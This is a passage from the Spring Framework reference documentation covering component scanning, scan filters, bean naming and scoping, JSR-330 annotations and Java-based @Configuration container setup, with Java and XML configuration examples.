For example,\nthe `@RestController` annotation from Spring MVC is __composed__ of `@Controller` and\n`@ResponseBody`.\n\nIn addition, composed annotations may optionally redeclare attributes from\nmeta-annotations to allow user customization. This can be particularly useful when you\nwant to only expose a subset of the meta-annotation's attributes. For example, Spring's\n`@SessionScope` annotation hardcodes the scope name to `session` but still allows\ncustomization of the `proxyMode`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.TYPE, ElementType.METHOD})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Scope(WebApplicationContext.SCOPE_SESSION)\n\tpublic @interface SessionScope {\n\n\t\t\/**\n\t\t * Alias for {@link Scope#proxyMode}.\n\t\t * <p>Defaults to {@link ScopedProxyMode#TARGET_CLASS}.\n\t\t *\/\n\t\t@AliasFor(annotation = Scope.class)\n\t\tScopedProxyMode proxyMode() default ScopedProxyMode.TARGET_CLASS;\n\n\t}\n----\n\n`@SessionScope` can then be used without declaring the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope**\n\tpublic class SessionScopedService {\n\t\t\/\/ ...\n\t}\n----\n\nOr with an overridden value for the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope(proxyMode = ScopedProxyMode.INTERFACES)**\n\tpublic class SessionScopedUserService implements UserService {\n\t\t\/\/ ...\n\t}\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[beans-scanning-autodetection]]\n=== Automatically detecting classes and registering bean definitions\n\nSpring can automatically detect stereotyped classes and register corresponding\n``BeanDefinition``s with the `ApplicationContext`. For example, the following two classes\nare eligible for such autodetection:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic SimpleMovieLister(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class JpaMovieFinder implements MovieFinder {\n\t\t\/\/ implementation elided for clarity\n\t}\n----\n\nTo autodetect these classes and register the corresponding beans, you need to add\n`@ComponentScan` to your `@Configuration` class, where the `basePackages` attribute\nis a common parent package for the two classes. (Alternatively, you can specify a\ncomma\/semicolon\/space-separated list that includes the parent package of each class.)\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n\t\t...\n\t}\n----\n\n[NOTE]\n====\nFor concision, the example above could have used the `value` attribute of the\nannotation, i.e. 
`@ComponentScan(\"org.example\")`\n====\n\nThe following is an alternative using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:component-scan base-package=\"org.example\"\/>\n\n\t<\/beans>\n----\n\n[TIP]\n====\n\nThe use of `<context:component-scan>` implicitly enables the functionality of\n`<context:annotation-config>`. There is usually no need to include the\n`<context:annotation-config>` element when using `<context:component-scan>`.\n====\n\n[NOTE]\n====\nThe scanning of classpath packages requires the presence of corresponding directory\nentries in the classpath. When you build JARs with Ant, make sure that you do __not__\nactivate the files-only switch of the JAR task. Also, classpath directories may not\nget exposed based on security policies in some environments, e.g. standalone apps on\nJDK 1.7.0_45 and higher (which requires 'Trusted-Library' setup in your manifests; see\nhttp:\/\/stackoverflow.com\/questions\/19394570\/java-jre-7u45-breaks-classloader-getresources).\n====\n\nFurthermore, the `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` are both included implicitly when you use the\ncomponent-scan element. That means that the two components are autodetected __and__\nwired together - all without any bean configuration metadata provided in XML.\n\n[NOTE]\n====\nYou can disable the registration of `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` by including the __annotation-config__ attribute\nwith a value of false.\n====\n\n\n\n[[beans-scanning-filters]]\n=== Using filters to customize scanning\n\nBy default, classes annotated with `@Component`, `@Repository`, `@Service`,\n`@Controller`, or a custom annotation that itself is annotated with `@Component` are the\nonly detected candidate components. However, you can modify and extend this behavior\nsimply by applying custom filters. Add them as __includeFilters__ or __excludeFilters__\nparameters of the `@ComponentScan` annotation (or as __include-filter__ or __exclude-filter__\nsub-elements of the `component-scan` element). Each filter element requires the `type`\nand `expression` attributes. 
The following table describes the filtering options.\n\n[[beans-scanning-filters-tbl]]\n.Filter Types\n|===\n| Filter Type| Example Expression| Description\n\n| annotation (default)\n| `org.example.SomeAnnotation`\n| An annotation to be present at the type level in target components.\n\n| assignable\n| `org.example.SomeClass`\n| A class (or interface) that the target components are assignable to (extend\/implement).\n\n| aspectj\n| `org.example..*Service+`\n| An AspectJ type expression to be matched by the target components.\n\n| regex\n| `org\\.example\\.Default.*`\n| A regex expression to be matched by the target components' class names.\n\n| custom\n| `org.example.MyTypeFilter`\n| A custom implementation of the `org.springframework.core.type.TypeFilter` interface.\n|===\n\nThe following example shows the configuration ignoring all `@Repository` annotations\nand using \"stub\" repositories instead.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\",\n\t\t\tincludeFilters = @Filter(type = FilterType.REGEX, pattern = \".*Stub.*Repository\"),\n\t\t\texcludeFilters = @Filter(Repository.class))\n\tpublic class AppConfig {\n\t\t...\n\t}\n----\n\nand the equivalent using XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\">\n\t\t\t<context:include-filter type=\"regex\"\n\t\t\t\t\texpression=\".*Stub.*Repository\"\/>\n\t\t\t<context:exclude-filter type=\"annotation\"\n\t\t\t\t\texpression=\"org.springframework.stereotype.Repository\"\/>\n\t\t<\/context:component-scan>\n\t<\/beans>\n----\n\n[NOTE]\n====\nYou can also disable the default filters by setting `useDefaultFilters=false` on the annotation or\nproviding `use-default-filters=\"false\"` as an attribute of the `<component-scan\/>` element. This\nwill in effect disable automatic detection of classes annotated with `@Component`, `@Repository`,\n`@Service`, `@Controller`, or `@Configuration`.\n====\n\n\n\n[[beans-factorybeans-annotations]]\n=== Defining bean metadata within components\n\nSpring components can also contribute bean definition metadata to the container. You do\nthis with the same `@Bean` annotation used to define bean metadata within `@Configuration`\nannotated classes. Here is a simple example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\tpublic void doWork() {\n\t\t\t\/\/ Component method implementation omitted\n\t\t}\n\n\t}\n----\n\nThis class is a Spring component that has application-specific code contained in its\n`doWork()` method. However, it also contributes a bean definition that has a factory\nmethod referring to the method `publicInstance()`. The `@Bean` annotation identifies the\nfactory method and other bean definition properties, such as a qualifier value through\nthe `@Qualifier` annotation. Other method-level annotations that can be specified are\n`@Scope`, `@Lazy`, and custom qualifier annotations.\n\n[TIP]\n====\nIn addition to its role for component initialization, the `@Lazy` annotation may also be\nplaced on injection points marked with `@Autowired` or `@Inject`. 
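\n\nA minimal sketch of such a lazy injection point (the type names are illustrative):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class MovieProcessor {\n\n\t\t\/\/ resolved on first access rather than at container startup\n\t\t@Autowired\n\t\t**@Lazy**\n\t\tprivate MovieLocator movieLocator;\n\n\t}\n----\n\n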
In this context, it\nleads to the injection of a lazy-resolution proxy.\n====\n\nAutowired fields and methods are supported as previously discussed, with additional\nsupport for autowiring of `@Bean` methods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\tprivate static int i;\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\t\/\/ use of a custom qualifier and autowiring of method parameters\n\n\t\t@Bean\n\t\tprotected TestBean protectedInstance(\n\t\t\t\t@Qualifier(\"public\") TestBean spouse,\n\t\t\t\t@Value(\"#{privateInstance.age}\") String country) {\n\t\t\tTestBean tb = new TestBean(\"protectedInstance\", 1);\n\t\t\ttb.setSpouse(spouse);\n\t\t\ttb.setCountry(country);\n\t\t\treturn tb;\n\t\t}\n\n\t\t@Bean\n\t\tprivate TestBean privateInstance() {\n\t\t\treturn new TestBean(\"privateInstance\", i++);\n\t\t}\n\n\t\t@Bean\n\t\t@RequestScope\n\t\tpublic TestBean requestScopedInstance() {\n\t\t\treturn new TestBean(\"requestScopedInstance\", 3);\n\t\t}\n\n\t}\n----\n\nThe example autowires the `String` method parameter `country` to the value of the `Age`\nproperty on another bean named `privateInstance`. A Spring Expression Language element\ndefines the value of the property through the notation `#{ <expression> }`. For `@Value`\nannotations, an expression resolver is preconfigured to look for bean names when\nresolving expression text.\n\nThe `@Bean` methods in a Spring component are processed differently than their\ncounterparts inside a Spring `@Configuration` class. The difference is that `@Component`\nclasses are not enhanced with CGLIB to intercept the invocation of methods and fields.\nCGLIB proxying is the means by which invoking methods or fields within `@Bean` methods\nin `@Configuration` classes creates bean metadata references to collaborating objects;\nsuch methods are __not__ invoked with normal Java semantics but rather go through the\ncontainer in order to provide the usual lifecycle management and proxying of Spring\nbeans even when referring to other beans via programmatic calls to `@Bean` methods.\nIn contrast, invoking a method or field in an `@Bean` method within a plain `@Component`\nclass __has__ standard Java semantics, with no special CGLIB processing or other\nconstraints applying.\n\n[NOTE]\n====\nYou may declare `@Bean` methods as `static`, allowing for them to be called without\ncreating their containing configuration class as an instance. This makes particular\nsense when defining post-processor beans, e.g. of type `BeanFactoryPostProcessor` or\n`BeanPostProcessor`, since such beans will get initialized early in the container\nlifecycle and should avoid triggering other parts of the configuration at that point.\n\nNote that calls to static `@Bean` methods will never get intercepted by the container,\nnot even within `@Configuration` classes (see above). This is due to technical\nlimitations: CGLIB subclassing can only override non-static methods. As a consequence,\na direct call to another `@Bean` method will have standard Java semantics, resulting\nin an independent instance being returned straight from the factory method itself.\n\nThe Java language visibility of `@Bean` methods does not have an immediate impact on\nthe resulting bean definition in Spring's container. 
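\n\nReturning to the static case, a hedged sketch of such an early-initialized\npost-processor declaration (`PropertySourcesPlaceholderConfigurer` is one common\n`BeanFactoryPostProcessor`):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t\/\/ static: invocable without instantiating AppConfig, so the\n\t\t\/\/ post-processor is available early in the container lifecycle\n\t\t@Bean\n\t\tpublic static PropertySourcesPlaceholderConfigurer propertyConfigurer() {\n\t\t\treturn new PropertySourcesPlaceholderConfigurer();\n\t\t}\n\n\t}\n----\n\n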
You may freely declare your\nfactory methods as you see fit in non-`@Configuration` classes and also for static\nmethods anywhere. However, regular `@Bean` methods in `@Configuration` classes need\nto be overridable, i.e. they must not be declared as `private` or `final`.\n\n`@Bean` methods will also be discovered on base classes of a given component or\nconfiguration class, as well as on Java 8 default methods declared in interfaces\nimplemented by the component or configuration class. This allows for a lot of\nflexibility in composing complex configuration arrangements, with even multiple\ninheritance being possible through Java 8 default methods as of Spring 4.2.\n\nFinally, note that a single class may hold multiple `@Bean` methods for the same\nbean, as an arrangement of multiple factory methods to use depending on available\ndependencies at runtime. This is the same algorithm as for choosing the \"greediest\"\nconstructor or factory method in other configuration scenarios: The variant with\nthe largest number of satisfiable dependencies will be picked at construction time,\nanalogous to how the container selects between multiple `@Autowired` constructors.\n====\n\n\n\n[[beans-scanning-name-generator]]\n=== Naming autodetected components\n\nWhen a component is autodetected as part of the scanning process, its bean name is\ngenerated by the `BeanNameGenerator` strategy known to that scanner. By default, any\nSpring stereotype annotation (`@Component`, `@Repository`, `@Service`, and\n`@Controller`) that contains a _name_ `value` will thereby provide that name to the\ncorresponding bean definition.\n\nIf such an annotation contains no _name_ `value` or for any other detected component (such\nas those discovered by custom filters), the default bean name generator returns the\nuncapitalized non-qualified class name. For example, if the following two components\nwere detected, the names would be `myMovieLister` and `movieFinderImpl`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service(\"myMovieLister\")\n\tpublic class SimpleMovieLister {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIf you do not want to rely on the default bean-naming strategy, you can provide a custom\nbean-naming strategy. First, implement the\n{api-spring-framework}\/beans\/factory\/support\/BeanNameGenerator.html[`BeanNameGenerator`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\", nameGenerator = MyNameGenerator.class)\n public class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tname-generator=\"org.example.MyNameGenerator\" \/>\n\t<\/beans>\n----\n\nAs a general rule, consider specifying the name with the annotation whenever other\ncomponents may be making explicit references to it. On the other hand, the\nauto-generated names are adequate whenever the container is responsible for wiring.\n\n\n\n[[beans-scanning-scope-resolver]]\n=== Providing a scope for autodetected components\n\nAs with Spring-managed components in general, the default and most common scope for\nautodetected components is `singleton`. 
However, sometimes you need a different scope\nwhich can be specified via the `@Scope` annotation. Simply provide the name of the scope\nwithin the annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Scope(\"prototype\")\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\nFor details on web-specific scopes, see <<beans-factory-scopes-other>>.\n\n\n[NOTE]\n====\nTo provide a custom strategy for scope resolution rather than relying on the\nannotation-based approach, implement the\n{api-spring-framework}\/context\/annotation\/ScopeMetadataResolver.html[`ScopeMetadataResolver`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopeResolver = MyScopeResolver.class)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\t\tscope-resolver=\"org.example.MyScopeResolver\" \/>\n\t<\/beans>\n----\n\nWhen using certain non-singleton scopes, it may be necessary to generate proxies for the\nscoped objects. The reasoning is described in <<beans-factory-scopes-other-injection>>.\nFor this purpose, a __scoped-proxy__ attribute is available on the component-scan\nelement. The three possible values are: no, interfaces, and targetClass. For example,\nthe following configuration will result in standard JDK dynamic proxies:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopedProxy = ScopedProxyMode.INTERFACES)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tscoped-proxy=\"interfaces\" \/>\n\t<\/beans>\n----\n\n\n\n[[beans-scanning-qualifiers]]\n=== Providing qualifier metadata with annotations\n\nThe `@Qualifier` annotation is discussed in <<beans-autowired-annotation-qualifiers>>.\nThe examples in that section demonstrate the use of the `@Qualifier` annotation and\ncustom qualifier annotations to provide fine-grained control when you resolve autowire\ncandidates. Because those examples were based on XML bean definitions, the qualifier\nmetadata was provided on the candidate bean definitions using the `qualifier` or `meta`\nsub-elements of the `bean` element in the XML. When relying upon classpath scanning for\nautodetection of components, you provide the qualifier metadata with type-level\nannotations on the candidate class. 
The following three examples demonstrate this\ntechnique:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Qualifier(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Genre(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Offline**\n\tpublic class CachingMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nAs with most annotation-based alternatives, keep in mind that the annotation metadata is\nbound to the class definition itself, while the use of XML allows for multiple beans\n__of the same type__ to provide variations in their qualifier metadata, because that\nmetadata is provided per-instance rather than per-class.\n====\n\n\n\n\n[[beans-standard-annotations]]\n== Using JSR 330 Standard Annotations\nStarting with Spring 3.0, Spring offers support for JSR-330 standard annotations\n(Dependency Injection). Those annotations are scanned in the same way as the Spring\nannotations. You just need to have the relevant jars in your classpath.\n\n[NOTE]\n====\nIf you are using Maven, the `javax.inject` artifact is available in the standard Maven\nrepository (\nhttp:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/[http:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/]).\nYou can add the following dependency to your file pom.xml:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<dependency>\n\t\t<groupId>javax.inject<\/groupId>\n\t\t<artifactId>javax.inject<\/artifactId>\n\t\t<version>1<\/version>\n\t<\/dependency>\n----\n====\n\n\n\n[[beans-inject-named]]\n=== Dependency Injection with @Inject and @Named\n\nInstead of `@Autowired`, `@javax.inject.Inject` may be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nAs with `@Autowired`, it is possible to use `@Inject` at the field level, method level\nand constructor-argument level. Furthermore, you may declare your injection point as a\n`Provider`, allowing for on-demand access to beans of shorter scopes or lazy access to\nother beans through a `Provider.get()` call. 
As a variant of the example above:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Provider;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate Provider<MovieFinder> movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(Provider<MovieFinder> movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.get().findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nIf you would like to use a qualified name for the dependency that should be injected,\nyou should use the `@Named` annotation as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(@Named(\"main\") MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[beans-named]]\n=== @Named and @ManagedBean: standard equivalents to the @Component annotation\n\nInstead of `@Component`, `@javax.inject.Named` or `javax.annotation.ManagedBean` may be\nused as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named(\"movieListener\") \/\/ @ManagedBean(\"movieListener\") could be used as well\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nIt is very common to use `@Component` without specifying a name for the component.\n`@Named` can be used in a similar fashion:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nWhen using `@Named` or `@ManagedBean`, it is possible to use component scanning in the\nexact same way as when using Spring annotations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nIn contrast to `@Component`, the JSR-330 `@Named` and the JSR-250 `ManagedBean`\nannotations are not composable. Please use Spring's stereotype model for building custom\ncomponent annotations.\n====\n\n\n\n[[beans-standard-annotations-limitations]]\n=== Limitations of JSR-330 standard annotations\n\nWhen working with standard annotations, it is important to know that some significant\nfeatures are not available as shown in the table below:\n\n[[annotations-comparison]]\n.Spring component model elements vs. JSR-330 variants\n|===\n| Spring| javax.inject.*| javax.inject restrictions \/ comments\n\n| @Autowired\n| @Inject\n| `@Inject` has no 'required' attribute; can be used with Java 8's `Optional` instead.\n\n| @Component\n| @Named \/ @ManagedBean\n| JSR-330 does not provide a composable model, just a way to identify named components.\n\n| @Scope(\"singleton\")\n| @Singleton\n| The JSR-330 default scope is like Spring's `prototype`. However, in order to keep it\n consistent with Spring's general defaults, a JSR-330 bean declared in the Spring\n container is a `singleton` by default. 
In order to use a scope other than `singleton`,\n you should use Spring's `@Scope` annotation. `javax.inject` also provides a\n http:\/\/download.oracle.com\/javaee\/6\/api\/javax\/inject\/Scope.html[@Scope] annotation.\n Nevertheless, this one is only intended to be used for creating your own annotations.\n\n| @Qualifier\n| @Qualifier \/ @Named\n| `javax.inject.Qualifier` is just a meta-annotation for building custom qualifiers.\n Concrete String qualifiers (like Spring's `@Qualifier` with a value) can be associated\n through `javax.inject.Named`.\n\n| @Value\n| -\n| no equivalent\n\n| @Required\n| -\n| no equivalent\n\n| @Lazy\n| -\n| no equivalent\n\n| ObjectFactory\n| Provider\n| `javax.inject.Provider` is a direct alternative to Spring's `ObjectFactory`,\n just with a shorter `get()` method name. It can also be used in combination with\n Spring's `@Autowired` or with non-annotated constructors and setter methods.\n|===\n\n\n\n\n[[beans-java]]\n== Java-based container configuration\n\n\n\n[[beans-java-basic-concepts]]\n=== Basic concepts: @Bean and @Configuration\n\nThe central artifacts in Spring's new Java-configuration support are\n`@Configuration`-annotated classes and `@Bean`-annotated methods.\n\nThe `@Bean` annotation is used to indicate that a method instantiates, configures, and\ninitializes a new object to be managed by the Spring IoC container. For those familiar\nwith Spring's `<beans\/>` XML configuration, the `@Bean` annotation plays the same role as\nthe `<bean\/>` element. You can use `@Bean` annotated methods with any Spring\n`@Component`; however, they are most often used with `@Configuration` beans.\n\nAnnotating a class with `@Configuration` indicates that its primary purpose is as a\nsource of bean definitions. Furthermore, `@Configuration` classes allow inter-bean\ndependencies to be defined by simply calling other `@Bean` methods in the same class.\nThe simplest possible `@Configuration` class would read as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic MyService myService() {\n\t\t\treturn new MyServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe `AppConfig` class above would be equivalent to the following Spring `<beans\/>` XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"myService\" class=\"com.acme.services.MyServiceImpl\"\/>\n\t<\/beans>\n----\n\n.Full @Configuration vs 'lite' @Beans mode?\n****\nWhen `@Bean` methods are declared within classes that are __not__ annotated with\n`@Configuration` they are referred to as being processed in a 'lite' mode. For example,\nbean methods declared in a `@Component` or even in a __plain old class__ will be\nconsidered 'lite'.\n\nUnlike full `@Configuration`, lite `@Bean` methods cannot easily declare inter-bean\ndependencies. Usually one `@Bean` method should not invoke another `@Bean` method when\noperating in 'lite' mode.\n\nUsing `@Bean` methods only within `@Configuration` classes is the recommended approach for\nensuring that 'full' mode is always used. This will prevent the same `@Bean` method from\naccidentally being invoked multiple times and helps to reduce subtle bugs that can be\nhard to track down when operating in 'lite' mode.\n****\n\nThe `@Bean` and `@Configuration` annotations will be discussed in depth in the sections\nbelow. 
First, however, we'll cover the various ways of creating a Spring container using\nJava-based configuration.\n\n[[beans-java-instantiating-container]]\n=== Instantiating the Spring container using AnnotationConfigApplicationContext\n\nThe sections below document Spring's `AnnotationConfigApplicationContext`, new in Spring\n3.0. This versatile `ApplicationContext` implementation is capable of accepting not only\n`@Configuration` classes as input, but also plain `@Component` classes and classes\nannotated with JSR-330 metadata.\n\nWhen `@Configuration` classes are provided as input, the `@Configuration` class itself\nis registered as a bean definition, and all declared `@Bean` methods within the class\nare also registered as bean definitions.\n\nWhen `@Component` and JSR-330 classes are provided, they are registered as bean\ndefinitions, and it is assumed that DI metadata such as `@Autowired` or `@Inject` are\nused within those classes where necessary.\n\n\n[[beans-java-instantiating-container-contstructor]]\n==== Simple construction\n\nIn much the same way that Spring XML files are used as input when instantiating a\n`ClassPathXmlApplicationContext`, `@Configuration` classes may be used as input when\ninstantiating an `AnnotationConfigApplicationContext`. This allows for completely\nXML-free usage of the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nAs mentioned above, `AnnotationConfigApplicationContext` is not limited to working only\nwith `@Configuration` classes. Any `@Component` or JSR-330 annotated class may be supplied\nas input to the constructor. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(MyServiceImpl.class, Dependency1.class, Dependency2.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nThe above assumes that `MyServiceImpl`, `Dependency1` and `Dependency2` use Spring\ndependency injection annotations such as `@Autowired`.\n\n\n[[beans-java-instantiating-container-register]]\n==== Building the container programmatically using register(Class<?>...)\n\nAn `AnnotationConfigApplicationContext` may be instantiated using a no-arg constructor\nand then configured using the `register()` method. 
This approach is particularly useful\nwhen programmatically building an `AnnotationConfigApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.register(AppConfig.class, OtherConfig.class);\n\t\tctx.register(AdditionalConfig.class);\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\n\n[[beans-java-instantiating-container-scan]]\n==== Enabling component scanning with scan(String...)\n\nTo enable component scanning, just annotate your `@Configuration` class as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"com.acme\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[TIP]\n====\n\nExperienced Spring users will be familiar with the XML declaration equivalent from\nSpring's `context:` namespace\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t<\/beans>\n----\n====\n\n\nIn the example above, the `com.acme` package will be scanned, looking for any\n`@Component`-annotated classes, and those classes will be registered as Spring bean\ndefinitions within the container. `AnnotationConfigApplicationContext` exposes the\n`scan(String...)` method to allow for the same component-scanning functionality:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.scan(\"com.acme\");\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t}\n----\n\n[NOTE]\n====\nRemember that `@Configuration` classes are <<beans-meta-annotations,meta-annotated>>\nwith `@Component`, so they are candidates for component-scanning! In the example above,\nassuming that `AppConfig` is declared within the `com.acme` package (or any package\nunderneath), it will be picked up during the call to `scan()`, and upon `refresh()` all\nits `@Bean` methods will be processed and registered as bean definitions within 